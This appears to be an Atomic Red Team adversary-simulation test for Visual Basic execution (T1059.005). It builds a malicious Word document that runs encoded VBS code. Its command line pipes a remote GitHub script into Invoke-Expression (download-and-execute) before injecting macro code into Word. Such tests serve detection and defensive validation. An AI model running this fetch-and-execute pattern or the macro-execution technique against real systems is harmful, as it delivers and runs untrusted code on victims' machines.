#TechniqueName: Command and Scripting Interpreter: Visual Basic
#AtomicTestName: Encoded VBS code execution
#Description: This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution&a message box will pop up displaying "ART T1059.005"&&A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.&You can validate this by opening WinWord -> File -> Account -> About Word&
#Language: ps1

#get_prereq_commands
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"


#commands
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"


#cleanup_commands
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null

